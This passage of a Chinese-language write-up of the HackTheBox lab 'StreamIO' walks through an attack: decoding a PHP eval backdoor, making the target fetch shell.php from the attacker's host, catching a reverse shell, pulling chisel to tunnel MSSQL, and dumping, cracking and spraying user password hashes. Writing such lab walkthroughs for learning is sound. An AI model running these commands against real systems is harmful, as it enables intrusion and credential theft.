9waHAgZWNobyAkcm93Wyd1c2VybmFtZSddOyA/PjwvaDQ+DQoJCTxkaXYgc3R5bGU9ImZsb2F0OnJpZ2h0O3BhZGRpbmctcmlnaHQ6IDI1cHg7Ij4NCgkJCTxmb3JtIG1ldGhvZD0iUE9TVCI+DQoJCQkJPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0idXNlcl9pZCIgdmFsdWU9Ijw/cGhwIGVjaG8gJHJvd1snaWQnXTsgPz4iPg0KCQkJCTxpbnB1dCB0eXBlPSJzdWJtaXQiIGNsYXNzPSJidG4gYnRuLXNtIGJ0bi1wcmltYXJ5IiB2YWx1ZT0iRGVsZXRlIj4NCgkJCTwvZm9ybT4NCgkJPC9kaXY+DQoJPC9kaXY+DQo8L2Rpdj4NCjw/cGhwDQp9ICMgd2hpbGUgZW5kDQo/Pg0KPGJyPjxocj48YnI+DQo8Zm9ybSBtZXRob2Q9IlBPU1QiPg0KPGlucHV0IG5hbWU9ImluY2x1ZGUiIGhpZGRlbj4NCjwvZm9ybT4NCjw/cGhwDQppZihpc3NldCgkX1BPU1RbJ2luY2x1ZGUnXSkpDQp7DQppZigkX1BPU1RbJ2luY2x1ZGUnXSAhPT0gImluZGV4LnBocCIgKSANCmV2YWwoZmlsZV9nZXRfY29udGVudHMoJF9QT1NUWydpbmNsdWRlJ10pKTsNCmVsc2UNCmVjaG8oIiAtLS0tIEVSUk9SIC0tLS0gIik7DQp9DQo/Pg==    

18、进行解码查看下，核心代码点，发现eval

<?php
if(isset($_POST['include']))
{
if($_POST['include'] !== "index.php" ) 
eval(file_get_contents($_POST['include']));
else
echo(" ---- ERROR ---- ");
}
?>

19、file_get_contents()：这是PHP的一个内置函数，用于读取文件并将内容作为字符串返回。当它接收到$_POST[‘include’]作为参数时，会尝试读取该字符串指定的文件路径，并将文件内容读取出来。

20、这不一个命令执行就有了啊，开始尝试，感觉像那个啥，就是返回的太多了，看不到最后的结果了，这里尝试下反弹shell吧

https://streamio.htb/admin/?debug=master.php

include=http://10.10.14.30/shell.php

curl 'https://streamio.htb/admin/?debug=master.php' -H 'Cookie: PHPSESSID=4fe1ieam8fbpr6ksldsh717gn1' -d 'include=http://10.10.14.30/shell.php'

┌──(kali㉿offsec)-[~/Desktop]
└─$ curl -k 'https://streamio.htb/admin/?debug=master.php' -H 'Cookie: PHPSESSID=nhn97rjkt48a0rphkoqf3j9qfv' -d 'include=http://10.10.14.30/shell.php'

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.158 - - [12/Apr/2024 01:33:08] "GET /shell.php HTTP/1.0" 200 -
10.10.11.158 - - [12/Apr/2024 01:35:10] "GET /shell.php HTTP/1.0" 200 -
10.10.11.158 - - [12/Apr/2024 01:38:50] "GET /shell.php HTTP/1.0" 200 -
10.10.11.158 - - [12/Apr/2024 01:45:40] "GET /shell.php HTTP/1.0" 200 -

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 443            
listening on [any] 443 ...
connect to [10.10.14.30] from (UNKNOWN) [10.10.11.158] 60181
id
PS C:\inetpub\streamio.htb\admin> whoami
streamio\yoshihide
PS C:\inetpub\streamio.htb\admin> 

21、这里我们就获取到了一个初始的shell环境，由于这个是中级靶机，所以到这里还需要枚举信息，来横向移动到另一个用户下，才能获取到第一个flag信息

PS C:\inetpub\streamio.htb\admin> netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING       644
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       892
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING       644
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING       644
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING       892
  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING       644
  TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING       3452
  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING       644
  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING       644
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING       2628
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       472
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       1140
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1532
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       644
  TCP    0.0.0.0:49673          0.0.0.0:0              LISTENING       644
  TCP    0.0.0.0:49674          0.0.0.0:0              LISTENING       644
  TCP    0.0.0.0:49679          0.0.0.0:0              LISTENING       616
  TCP    0.0.0.0:49737          0.0.0.0:0              LISTENING       2756
  TCP    10.10.11.158:53        0.0.0.0:0              LISTENING       2756
  TCP    10.10.11.158:139       0.0.0.0:0              LISTENING       4
  TCP    10.10.11.158:389       10.10.11.158:49736     ESTABLISHED     644
  TCP    10.10.11.158:443       10.10.14.30:33474      ESTABLISHED     4
  TCP    10.10.11.158:443       10.10.14.30:34162      ESTABLISHED     4
  TCP    10.10.11.158:49736     10.10.11.158:389       ESTABLISHED     2756
  TCP    10.10.11.158:55361     10.10.14.30:443        ESTABLISHED     4580
  TCP    127.0.0.1:53           0.0.0.0:0              LISTENING       2756
  TCP    127.0.0.1:389          127.0.0.1:49731        ESTABLISHED     644
  TCP    127.0.0.1:389          127.0.0.1:55352        ESTABLISHED     644
  TCP    127.0.0.1:49731        127.0.0.1:389          ESTABLISHED     2756
  TCP    127.0.0.1:55352        127.0.0.1:389          ESTABLISHED     2628
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:88                [::]:0                 LISTENING       644
  TCP    [::]:135               [::]:0                 LISTENING       892
  TCP    [::]:443               [::]:0                 LISTENING       4
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:464               [::]:0                 LISTENING       644
  TCP    [::]:593               [::]:0                 LISTENING       892
  TCP    [::]:1433              [::]:0                 LISTENING       3452
  TCP    [::]:3268              [::]:0                 LISTENING       644
  TCP    [::]:3269              [::]:0                 LISTENING       644
  TCP    [::]:5985              [::]:0                 LISTENING       4
  TCP    [::]:9389              [::]:0                 LISTENING       2628
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49664             [::]:0                 LISTENING       472
  TCP    [::]:49665             [::]:0                 LISTENING       1140
  TCP    [::]:49666             [::]:0                 LISTENING       1532
  TCP    [::]:49667             [::]:0                 LISTENING       644
  TCP    [::]:49673             [::]:0                 LISTENING       644
  TCP    [::]:49674             [::]:0                 LISTENING       644
  TCP    [::]:49679             [::]:0                 LISTENING       616
  TCP    [::]:49737             [::]:0                 LISTENING       2756
  TCP    [::1]:53               [::]:0                 LISTENING       2756
  TCP    [::1]:3268             [::1]:55355            ESTABLISHED     644
  TCP    [::1]:49673            [::1]:49700            ESTABLISHED     644
  TCP    [::1]:49678            [::1]:49673            TIME_WAIT       0
  TCP    [::1]:49690            [::1]:135              TIME_WAIT       0
  TCP    [::1]:49691            [::1]:49673            TIME_WAIT       0
  TCP    [::1]:49696            [::1]:49673            TIME_WAIT       0
  TCP    [::1]:49699            [::1]:135              TIME_WAIT       0
  TCP    [::1]:49700            [::1]:49673            ESTABLISHED     3152
  TCP    [::1]:49703            [::1]:49673            TIME_WAIT       0
  TCP    [::1]:55355            [::1]:3268             ESTABLISHED     2628
  TCP    [dead:beef::1da]:53    [::]:0                 LISTENING       2756
  TCP    [dead:beef::549b:f627:893c:c0fe]:53  [::]:0                 LISTENING       2756
  TCP    [fe80::549b:f627:893c:c0fe%12]:53  [::]:0                 LISTENING       2756
  UDP    0.0.0.0:123            *:*                                    300
  UDP    0.0.0.0:389            *:*                                    644
  UDP    0.0.0.0:5353           *:*                                    1080
  UDP    0.0.0.0:5355           *:*                                    1080
  UDP    0.0.0.0:64897          *:*                                    2756
  UDP    10.10.11.158:53        *:*                                    2756
  UDP    10.10.11.158:88        *:*                                    644
  UDP    10.10.11.158:137       *:*                                    4
  UDP    10.10.11.158:138       *:*                                    4
  UDP    10.10.11.158:464       *:*                                    644
  UDP    127.0.0.1:53           *:*                                    2756
  UDP    127.0.0.1:60647        *:*                                    2148
  UDP    127.0.0.1:61067        *:*                                    2628
  UDP    127.0.0.1:61068        *:*                                    2776
  UDP    127.0.0.1:61069        *:*                                    2756
  UDP    127.0.0.1:61070        *:*                                    1372
  UDP    127.0.0.1:61071        *:*                                    1296
  UDP    [::]:123               *:*                                    300
  UDP    [::]:5353              *:*                                    1080
  UDP    [::]:5355              *:*                                    1080
  UDP    [::]:64898             *:*                                    2756
  UDP    [::1]:53               *:*                                    2756
  UDP    [::1]:61064            *:*                                    2756
  UDP    [dead:beef::1da]:53    *:*                                    2756
  UDP    [dead:beef::1da]:88    *:*                                    644
  UDP    [dead:beef::1da]:464   *:*                                    644
  UDP    [dead:beef::549b:f627:893c:c0fe]:53  *:*                                    2756
  UDP    [dead:beef::549b:f627:893c:c0fe]:88  *:*                                    644
  UDP    [dead:beef::549b:f627:893c:c0fe]:464  *:*                                    644
  UDP    [fe80::549b:f627:893c:c0fe%12]:53  *:*                                    2756
  UDP    [fe80::549b:f627:893c:c0fe%12]:88  *:*                                    644
  UDP    [fe80::549b:f627:893c:c0fe%12]:464  *:*                                    644
PS C:\inetpub\streamio.htb\admin> 


PS C:\inetpub\streamio.htb\admin> net user

User accounts for \\DC

-------------------------------------------------------------------------------
Administrator            Guest                    JDgodd                   
krbtgt                   Martin                   nikk37                   
yoshihide                
The command completed successfully.

PS C:\inetpub\streamio.htb\admin> whoami
streamio\yoshihide
PS C:\inetpub\streamio.htb\admin> net users /domain

User accounts for \\DC

-------------------------------------------------------------------------------
Administrator            Guest                    JDgodd                   
krbtgt                   Martin                   nikk37                   
yoshihide                
The command completed successfully.

PS C:\inetpub\streamio.htb\admin> net time /domain
Current time at \\DC.streamIO.htb is 4/11/2024 1:59:39 PM

The command completed successfully.

PS C:\inetpub\streamio.htb\admin> 


PS C:\inetpub\streamio.htb\admin> cd C:/Users
PS C:\Users> ls


    Directory: C:\Users


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        2/22/2022   2:48 AM                .NET v4.5                                                             
d-----        2/22/2022   2:48 AM                .NET v4.5 Classic                                                     
d-----        2/26/2022  10:20 AM                Administrator                                                         
d-----         5/9/2022   5:38 PM                Martin                                                                
d-----        2/26/2022   9:48 AM                nikk37                                                                
d-r---        2/22/2022   1:33 AM                Public                                                                


PS C:\Users> 


PS C:\inetpub> cd watch.streamio.htb
PS C:\inetpub\watch.streamio.htb> ls


    Directory: C:\inetpub\watch.streamio.htb


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        2/26/2022  12:38 AM                static                                                                
-a----        2/26/2022  12:29 AM            677 blocked.php                                                           
-a----        7/30/2021   3:02 AM           1150 favicon.ico                                                           
-a----        2/26/2022  12:34 AM           2944 index.php                                                             
-a----        2/26/2022   3:52 AM           2367 search.php                                                            
-a----        2/26/2022  12:00 AM            452 web.config                                                            


PS C:\inetpub\watch.streamio.htb> cat search.php
<?php
$search = strtolower($_POST['q']);

// sqlmap choker
$shitwords = ["/WAITFOR/i", "/vkBQ/i", "/CHARINDEX/i", "/ALL/i", "/SQUARE/i", "/ORDER/i", "/IF/i","/DELAY/i", "/NULL/i", "/UNICODE/i","/0x/i", "/\*\*/", "/-- [a-z0-9]{4}/i", "ifnull/i", "/ or /i"];
foreach ($shitwords as $shitword) {
        if (preg_match( $shitword, $search )) {
                header("Location: https://watch.streamio.htb/blocked.php");
                die("blocked");
        }
}


# Query section
$connection = array("Database"=>"STREAMIO", "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
$handle = sqlsrv_connect('(local)',$connection);
if (!isset($_POST['q']))
{

        $query = "select * from movies order by movie";
        $res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
else
{
        $_SESSION['no_of_reqs'] +=1;
        $query = "select * from movies where movie like '%".$_POST['q']."%' order by movie";
        $res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
?>
<!DOCTYPE html>
<html>
<head>
        <meta charset="utf-8">
        <title>Streamio</title>
        <link rel = "icon" href="static/icon.png" type = "image/x-icon">
        <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p" crossorigin="anonymous"></script>
        <link rel="stylesheet" type="text/css" href="static/css/bootstrap.css">
        <link rel="stylesheet" type="text/css" href="static/css/search.css">
        <script type="text/javascript">
                function unavailable() {
                        alert("Movie Steaming is currently unavailable due to Some security issues");
                }
        </script>
</head>
<body>
        <center>
                <img id="logo" src="static/logo.png">
        </center>
        <br><br>
        <h3>Search for a movie:</h3>
        <form action="/search.php" method="POST">
                <div class="input-group">
                        <input type="text" name="q" class="form-control" autofocus>
                        <button type="submit" class="btn btn-primary">Search</button>
                </div>
        </form>
        <br><br>
        <div>
                <?php
                while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
                {
                        echo '<div class="d-flex movie align-items-end">
                                <div class="mr-auto p-2">
                                        <h5 class="p-2">'.$row["movie"].'</h5>
                                </div>
                                <div class="ms-auto p-2">
                                        <span class="">'.$row["year"] .'</span>
                                        <button class="btn btn-dark" onclick="unavailable();">Watch</button>
                                </div>
                        </div>';
                }
                ?>

        </div>
</body>
</html>
PS C:\inetpub\watch.streamio.htb> 



PS C:\inetpub\streamio.htb\admin> ls


    Directory: C:\inetpub\streamio.htb\admin


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        2/22/2022   2:49 AM                css                                                                   
d-----        2/22/2022   2:49 AM                fonts                                                                 
d-----        2/22/2022   2:49 AM                images                                                                
d-----        2/22/2022   3:19 AM                js                                                                    
-a----         6/3/2022   1:51 AM           2401 index.php                                                             
-a----         6/3/2022   1:53 AM           3055 master.php                                                            
-a----        2/23/2022   2:16 AM            878 movie_inc.php                                                         
-a----        2/23/2022   2:16 AM            936 staff_inc.php                                                         
-a----        2/23/2022   2:16 AM            879 user_inc.php                                                          


PS C:\inetpub\streamio.htb\admin>
PS C:\inetpub\streamio.htb\admin> cat index.php
<?php
define('included',true);
session_start();
if(!isset($_SESSION['admin']))
{
        header('HTTP/1.1 403 Forbidden');
        die("<h1>FORBIDDEN</h1>");
}
$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
$handle = sqlsrv_connect('(local)',$connection);

?>
<!DOCTYPE html>
<html>
<head>
        <meta charset="utf-8">
        <title>Admin panel</title>
        <link rel = "icon" href="/images/icon.png" type = "image/x-icon">
        <!-- Basic -->
        <meta charset="utf-8" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <!-- Mobile Metas -->
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
        <!-- Site Metas -->
        <meta name="keywords" content="" />
        <meta name="description" content="" />
        <meta name="author" content="" />

<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p" crossorigin="anonymous"></script>

        <!-- Custom styles for this template -->
        <link href="/css/style.css" rel="stylesheet" />
        <!-- responsive style -->
        <link href="/css/responsive.css" rel="stylesheet" />

</head>
<body>
        <center class="container">
                <br>
                <h1>Admin panel</h1>
                <br><hr><br>
                <ul class="nav nav-pills nav-fill">
                        <li class="nav-item">
                                <a class="nav-link" href="?user=">User management</a>
                        </li>
                        <li class="nav-item">
                                <a class="nav-link" href="?staff=">Staff management</a>
                        </li>
                        <li class="nav-item">
                                <a class="nav-link" href="?movie=">Movie management</a>
                        </li>
                        <li class="nav-item">
                                <a class="nav-link" href="?message=">Leave a message for admin</a>
                        </li>
                </ul>
                <br><hr><br>
                <div id="inc">
                        <?php
                                if(isset($_GET['debug']))
                                {
                                        echo 'this option is for developers only';
                                        if($_GET['debug'] === "index.php") {
                                                die(' ---- ERROR ----');
                                        } else {
                                                include $_GET['debug'];
                                        }
                                }
                                else if(isset($_GET['user']))
                                        require 'user_inc.php';
                                else if(isset($_GET['staff']))
                                        require 'staff_inc.php';
                                else if(isset($_GET['movie']))
                                        require 'movie_inc.php';
                                else 
                        ?>
                </div>
        </center>
</body>
</html>
PS C:\inetpub\streamio.htb\admin> 

22、这里的枚举中，发现了个数据库的账号密码，我这里想的是做一个简单的端口转发，然后我使用本地的工具，去登录数据库

PS C:\Downloads> iwr -uri http://10.10.14.30:8080/chisel_1.9.1_windows_amd64 -o C:\Downloads\chisel_1.9.1_windows_amd64.exe
PS C:\Downloads> ls


    Directory: C:\Downloads


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        4/11/2024   3:57 PM        9006080 chisel_1.9.1_windows_amd64.exe                                        


PS C:\Downloads> ./chisel_1.9.1_windows_amd64.exe client 10.10.14.30:8000 R:1433:127.0.0.1:1433

┌──(kali㉿offsec)-[~/Desktop/tools/chisel]
└─$ ./chisel_1.9.1_linux_arm64 server -p 8000 --reverse                   
2024/04/12 07:51:16 server: Reverse tunnelling enabled
2024/04/12 07:51:16 server: Fingerprint 9xrg8OCrxsTW8g0SixIuufOcSpiDRZtkZLu3jTsVtjE=
2024/04/12 07:51:16 server: Listening on http://0.0.0.0:8000
2024/04/12 07:52:40 server: session#1: tun: proxy#R:1433=>1433: Listening

23、端口是转发出来了，然后我们使用mssqlclient工具进行连接和枚举

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-mssqlclient db_admin:B1@hx31234567890@127.0.0.1              
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC): Line 1: Changed database context to 'master'.
[*] INFO(DC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (db_admin  db_admin@master)> 


SQL (db_admin  db_admin@master)> select name from sys.databases;
name              
---------------   
master            

tempdb            

model             

msdb              

STREAMIO          

streamio_backup   

SQL (db_admin  db_admin@master)> 


SQL (db_admin  db_admin@master)> select name from streamio_backup.dbo.sysobjects where xtype='U'
name     
------   
movies   

users    

SQL (db_admin  db_admin@master)> select name from streamio_backup.dbo.syscolumns where name='users'
name   
----   
SQL (db_admin  db_admin@master)> select * from users;
id   username                                             password                                             is_staff   
--   --------------------------------------------------   --------------------------------------------------   --------   
 3   James                                                c660060492d9edcaa8332d89c99c9239                            1   

 4   Theodore                                             925e5408ecb67aea449373d668b7359e                            1   

 5   Samantha                                             083ffae904143c4796e464dac33c1f7d                            1   

 6   Lauren                                               08344b85b329d7efd611b7a7743e8a09                            1   

 7   William                                              d62be0dc82071bccc1322d64ec5b6c51                            1   

 8   Sabrina                                              f87d3c0d6c8fd686aacc6627f1f493a5                            1   

 9   Robert                                               f03b910e2bd0313a23fdd7575f34a694                            1   

10   Thane                                                3577c47eb1e12c8ba021611e1280753c                            1   

11   Carmon                                               35394484d89fcfdb3c5e447fe749d213                            1   

12   Barry                                                54c88b2dbd7b1a84012fabc1a4c73415                            1   

13   Oliver                                               fd78db29173a5cf701bd69027cb9bf6b                            1   

14   Michelle                                             b83439b16f844bd6ffe35c02fe21b3c0                            1   

15   Gloria                                               0cfaaaafb559f081df2befbe66686de0                            1   

16   Victoria                                             b22abb47a02b52d5dfa27fb0b534f693                            1   

17   Alexendra                                            1c2b3d8270321140e5153f6637d3ee53                            1   

18   Baxter                                               22ee218331afd081b0dcd8115284bae3                            1   

19   Clara                                                ef8f3d30a856cf166fb8215aca93e9ff                            1   

20   Barbra                                               3961548825e3e21df5646cafe11c6c76                            1   

21   Lenord                                               ee0b8a0937abd60c2882eacb2f8dc49f                            1   

22   Austin                                               0049ac57646627b8d7aeaccf8b6a936f                            1   

23   Garfield                                             8097cedd612cc37c29db152b6e9edbd3                            1   

24   Juliette                                             6dcd87740abb64edfa36d170f0d5450d                            1   

25   Victor                                               bf55e15b119860a6e6b5a164377da719                            1   

26   Lucifer                                              7df45a9e3de3863807c026ba48e55fb3                            1   

27   Bruno                                                2a4e2cf22dd8fcb45adcb91be1e22ae8                            1   

28   Diablo                                               ec33265e5fc8c2f1b0c137bb7b3632b5                            1   

29   Robin                                                dc332fb5576e9631c9dae83f194f8e70                            1   

30   Stan                                                 384463526d288edcc95fc3701e523bc7                            1   

31   yoshihide                                            b779ba15cedfd22a023c4d8bcf5f2332                            1   

SQL (db_admin  db_admin@master)> 


好像数据库不太对，得切换下

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-mssqlclient db_admin:B1@hx31234567890@127.0.0.1 -db streamio_backup
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: streamio_backup
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC): Line 1: Changed database context to 'streamio_backup'.
[*] INFO(DC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (db_admin  db_admin@streamio_backup)> select * from streamio_backup.dbo.syscolumns where name='users'
name   id   xtype   typestat   xusertype   length   xprec   xscale   colid   xoffset   bitpos   reserved   colstat   cdefault   domain   number   colorder   autoval   offset   collationid   language   status   type   usertype   printfmt   prec   scale   iscomputed   isoutparam   isnullable   collation   tdscollation   
----   --   -----   --------   ---------   ------   -----   ------   -----   -------   ------   --------   -------   --------   ------   ------   --------   -------   ------   -----------   --------   ------   ----   --------   --------   ----   -----   ----------   ----------   ----------   ---------   ------------   
SQL (db_admin  db_admin@streamio_backup)> select * from users;
id   username                                             password                                             
--   --------------------------------------------------   --------------------------------------------------   
 1   nikk37                                               389d14cb8e4e9b94b137deb1caf0612a                     

 2   yoshihide                                            b779ba15cedfd22a023c4d8bcf5f2332                     

 3   James                                                c660060492d9edcaa8332d89c99c9239                     

 4   Theodore                                             925e5408ecb67aea449373d668b7359e                     

 5   Samantha                                             083ffae904143c4796e464dac33c1f7d                     

 6   Lauren                                               08344b85b329d7efd611b7a7743e8a09                     

 7   William                                              d62be0dc82071bccc1322d64ec5b6c51                     

 8   Sabrina                                              f87d3c0d6c8fd686aacc6627f1f493a5                     

SQL (db_admin  db_admin@streamio_backup)> 

24、下面简单的列一下发现的密码信息

nikk37
 389d14cb8e4e9b94b137deb1caf0612a
yoshihide
 b779ba15cedfd22a023c4d8bcf5f2332
James
 c660060492d9edcaa8332d89c99c9239
Theodore
 925e5408ecb67aea449373d668b7359e
Samantha
 083ffae904143c4796e464dac33c1f7d
Lauren
 08344b85b329d7efd611b7a7743e8a09
William
 d62be0dc82071bccc1322d64ec5b6c51
Sabrina
 f87d3c0d6c8fd686aacc6627f1f493a5

nikk37
yoshihide
James
Theodore
Samantha
Lauren
William
Sabrina

389d14cb8e4e9b94b137deb1caf0612a
b779ba15cedfd22a023c4d8bcf5f2332
c660060492d9edcaa8332d89c99c9239
925e5408ecb67aea449373d668b7359e
083ffae904143c4796e464dac33c1f7d
08344b85b329d7efd611b7a7743e8a09
d62be0dc82071bccc1322d64ec5b6c51
f87d3c0d6c8fd686aacc6627f1f493a5

-------------------  下面是解密的结果
  
389d14cb8e4e9b94b137deb1caf0612a    md5 get_dem_girls2@yahoo.com
b779ba15cedfd22a023c4d8bcf5f2332    md5 66boysandgirls..
c660060492d9edcaa8332d89c99c9239    Unknown Not found.
925e5408ecb67aea449373d668b7359e    Unknown Not found.
083ffae904143c4796e464dac33c1f7d    Unknown Not found.
08344b85b329d7efd611b7a7743e8a09    md5 ##123a8j8w5123##
d62be0dc82071bccc1322d64ec5b6c51    Unknown Not found.
f87d3c0d6c8fd686aacc6627f1f493a5    md5 !!sabrina$

25、这里获取的用户和主机上存在的用户很相似，这里使用crackmapexec 工具或者 evil-winrm 工具尝试验活下

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.11.158 -u users.txt -p password.txt --continue-on-success                                                       
SMB         10.10.11.158    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.158    445    DC               [+] streamIO.htb\nikk37:get_dem_girls2@yahoo.com 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\nikk37:66boysandgirls.. STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\nikk37:##123a8j8w5123## STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\nikk37:!!sabrina$ STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:get_dem_girls2@yahoo.com STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:66boysandgirls.. STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:##123a8j8w5123## STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:!!sabrina$ STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\James:get_dem_girls2@yahoo.com STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\James:66boysandgirls.. STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\James:##123a8j8w5123## STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\James:!!sabrina$ STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\Theodore:get_dem_girls2@yahoo.com STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\Theodore:66boysandgirls.. STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\Theodore:##123a8j8w5123## STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\Theodore:!!sabrina$ STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\Samantha:get_dem_girls2@yahoo.com STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\Samantha:66boysandgirls.. STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\Samantha:##123a8j8w5123## STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\Samantha:!!sabrina$ STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\Lauren:get_dem_girls2@yahoo.com STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\Lauren:66boysandgirls.. STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\Lauren:##123a8j8w5123## STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\Lauren:!!sabrina$ STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\William:get_dem_girls2@yahoo.com STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\William:66boysandgirls.. STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\William:##123a8j8w5123## STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\William:!!sabrina$ STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\Sabrina:get_dem_girls2@yahoo.com STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\Sabrina:66boysandgirls.. STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\Sabrina:##123a8j8w5123## STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\Sabrina:!!sabrina$ STATUS_LOGON_FAILURE 

26、然后使用可以登录的账号密码进行登录，并获取到第一个flag信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.11.158 -u nikk37 -p 'get_dem_girls2@yahoo.com'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nikk37\Documents> whoami
streamio\nikk37
